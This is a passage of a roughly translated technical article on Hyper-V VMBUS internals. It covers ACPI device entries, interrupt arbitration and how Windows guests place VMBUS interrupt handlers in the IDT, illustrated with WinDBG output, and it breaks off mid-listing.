<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the time of writing the article the used Hyper-V server and guest OS was Windows Server 2012 R2 Update 1 (machine type-1 Generation), but to reflect some of the features of the components we´ve used other versions of the Windows operating system, which will be stated in this article. For a test environment, you have to deploy the VMware Workstation 12.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1.VMBUS</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a nutshell the VMBUS is a technology of interaction between the guest operating systems and root OS accordingly.</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are components in the guest and root OS that implements this interaction through the interfaces provided by the hypervisor and described in TLFS 4.0(a). Microsoft developed the components for Linux-like guest operating systems, which are already integrated into the kernel (</span><a href="http://www.microsofttranslator.com/bv.aspx?from=ru&to=en&a=https%3A%2F%2Fgithub.com%2FLIS" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https:/github. com/LIS</span></a><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></b></div>
<b style="font-weight: normal;">
</b><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Starting with Windows Server 2008, the Windows kernel functions were optimized for the operating system in a virtual environment Hyper-V. For comparison, in the core of Windows Server 2008 (x64) are 25 functions implemented with the prefix Hvl, which identifies them as belonging to a library to integrate with the hypervisor. Windows Server 2012 R2 has 109 Hvl-functions already. Windows Server 2016 TP2 has 12 Hvi-functions and 230 Hvl-functions.</span></b></div>
<b style="font-weight: normal;">
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Consider, how the components of VMBUS interacts with the hypervisor, root and guest OS. First look into the source code of LIS and see that the VMBUS is a device which supports ACPI. ACPI devices can be viewed by using the ACPI Utility tool, included in the AIDA64 version 3. XX (later it was removed). With its help in SB_.PCI0.SBRG it detected 2 devices: VMB8 and VMBS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="117" src="https://lh3.googleusercontent.com/gPm8ERoifcsuAEDO97n-gSCIeKhvRNI6TVyHXhU18UosfbWYlcsXAmjpBCJ1kIrdLkVg9ixwPig6m0T6Pqh--OSZL5y-nxdzTOeWAhrPqi4JPe7tIVgBjBb1aidU5QsFjUMGImeeeXe7f8oq" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="138" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dump ACPI DSDT table that contains information on peripheral devices and functions of the hardware platform, using the same tools and ACPI Tool to decompile AML-disassembler (http://goo.gl/1pOZPX) in ASL. We obtain:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="360" src="https://lh4.googleusercontent.com/HcVlMnR5JJOgIRu3hbmFILy4L736a-cYSt9b8Nb0f7vP7vcJaHVvrwzdVvs0TYe27aIe3Si-0Bidwl6MY9ol2gzHQv843iv-3QWNFZfHaBDjwECyN-hM5rArrNdrypT64YWMganU7TCAHeKQ" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="560" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A superficial reading of ACPI Specification 5.0 made it clear that if the guest OS is Windows 6.2 and higher, the device will consume VMB8, otherwise VMBS. The only difference between these devices is the presence of an object _UID (UniqID), which is present in the VMB8. According to the ACPI specification, the presence of that object in the table is optional and is only required if the device can not present to operating system permanent unique ID. Also became a known resources that used by device - interrupt 5 and 7.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison, in the virtual machine type Generation 2 there are only the devices VMBS placed in _SB_. VMOD. VMBS, (but with the object _UID) which using only interrupt 5:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="134" src="https://lh6.googleusercontent.com/kGbnDGF34f7AzW6H1VVUDk30482wGhcdkLt7DObx5Y9VOZCKClG6TmSM1sJ-WGAAxyo61Sih0-RlVCbYWGUHIqg5Q0rVH_ykPloB8aL4LMUKq2jucfCekOUTmcIqBU5vjRHiNjAjJpLlhs56" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="398" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Routines, that dispatch interrupts, register in interrupt dispatch table (IDT). Meanwhile we found on ACPI DSDT IRQ 5 and 7 that the handlers in the IDT having no direct connection, and to compare its interruption handler, Windows uses the referee interrupts (generally, there are several classes of arbitrators, in addition IRQ, - DMA, I / O, memory). All about the arbitrators can be found in the MSDN blog (http://goo.gl/FuvG4R, http://goo.gl/V3UV8e, http://goo.gl/h1vXaf)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Information about registered arbitrators can be seen in WinDBG with the command !acpiirqarb.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !acpiirqarb – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for the Guest Windows Server 2012 R2 Gen1:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="161" src="https://lh5.googleusercontent.com/Qb6ZO0J21iNtEcPoBRbYrb3qSXQndRKhxJqLcDzR0TvFPTAGZ0PRjg3zzG0LuZfDqDfbcWUjgBxkURtcl3cVKPA_X_-i55eIvFFKHsI6OlixowFsDLbf5OlmuwwC3VswwSOw7yYFGt6OEkwJ" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="571" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The output shows that the IRQ 7 address handler that will be in the 0x71 cell of IDT, for IRQ 5 - 0x81. Generation numbers interrupt handlers are using the acpi!ProcessorReserveIdtEntries function at the stage of construction of the device tree PnP-manager, when the functional device driver is not already loaded. Register ISR in the IDT has been going in the later stages, for example, when the device driver procedure IoConnectInterrupt will be executed. However, looking at the elements of IDT, we see that the ISR for the interrupt of 0x71 and 0x81 is not registered: </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt -a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">71:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff80323f73938 nt!KxUnexpectedInterrupt0+0x388</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff80323f739b8 nt!KxUnexpectedInterrupt0+0x408</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows Server 2012 R2 Gen2 for IRQ 5 was mapped 0x90 the IDT.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !acpiirqarb – for guest Windows Server 2012 R2 Gen2</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processor 0 (0, 0):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device Object: 0000000000000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current IDT Allocation:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0000000000000000 - 0000000000000050 00000000 <Not on bus> A:0000000000000000 IRQ(GSIV):10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0000000000000090 - 0000000000000090 D ffffe001f35eb520 (vmbus) A:ffffc00133972660 IRQ(GSIV):5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ISR -procedure for interrupt 0x90 also is not defined:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt -a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8014a3daa30 nt!KxUnexpectedInterrupt0+0x480</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows 8.1x86 we see a slightly different picture</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !acpiirqarb – for Windows 8.1 x86</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processor 0 (0, 0):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device Object: 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current IDT Allocation:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0000000000000081 - 0000000000000081 D 87f2f030 (vmbus) A:881642a8 IRQ(GSIV):fffffffe – such values are generally associated with MSI-devices.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00000000000000b2 - 00000000000000b2 S B 87f31030 (s3cap) A:8814b840 IRQ(GSIV):5</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In addition, for interrupt number 0x81 ISR-defined procedure vmbus!XPartPncIsr:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81b18a0c vmbus!XPartPncIsr (KINTERRUPT </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">87b59e40</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b2:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81b18c58 nt!KiUnexpectedInterrupt130</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">s3cap - auxiliary driver to work with Hyper-V emulated video card S3 Trio.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="190" src="https://lh6.googleusercontent.com/EwIkG9PHPhHsIdUnKbhdZT5UZi-E1ZhIiYzLAnBKKYG1RGllvlqkxAb2EMZ-k4l6oZ1NHfxV7tAPnNy59Qmd3tuWd4G3lHp3mEVU1jtOENIEfUXeRHcDm5TZ0oDdpNOpkQr0Rqi2ybehGAcC" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="361" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Thus ISR vmbus! XPartPncIsr registered in the IDT only in Windows 8.1 x86 (presumably in other x86 operating systems that support Microsoft as a guest operating system for Hyper-V, using the same method). Procedure vmbus!XPartPncIsr used for handling interrupts is generated by the hypervisor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In x 64-bit systems, starting with Windows 8 \ Windows Server 2012, integration with the hypervisor is implemented slightly differently. In the IDT system and interrupt handlers have been added which were generated by the hypervisor. Let us briefly consider how the IDT is formed at the stage of Windows loading.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After initialization the Windows loader winload.efi IDT looks as follows (output of the script pykd from a WinDBG breakpoint in winload.efi during the boot process with the parameter / bootdebug):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py D:\hyperv4\idt_winload_parse.py</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 1 address = winload!BdTrap01</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 3 address = winload!BdTrap03</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr d address = winload!BdTrap0d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr e address = winload!BdTrap0e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 29 address = winload!BdTrap29</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 2c address = winload!BdTrap2c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 2d address = winload!BdTrap2d</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then during winload!OslArchTransferToKernel IDT is cleared and control is passed to the kernel of Windows, where a function nt!KiInitializeBootStructures initialized IDT with the values from the table KiInterruptInitTable:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dps KiInterruptInitTable L40</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553c0 00000000`00000030</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553c8 fffff800`1b377160 nt!KiHvInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553d0 00000000`00000031</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553d8 fffff800`1b3774c0 nt!KiVmbusInterrupt0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553e0 00000000`00000032</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553e8 fffff800`1b377810 nt!KiVmbusInterrupt1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553f0 00000000`00000033</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
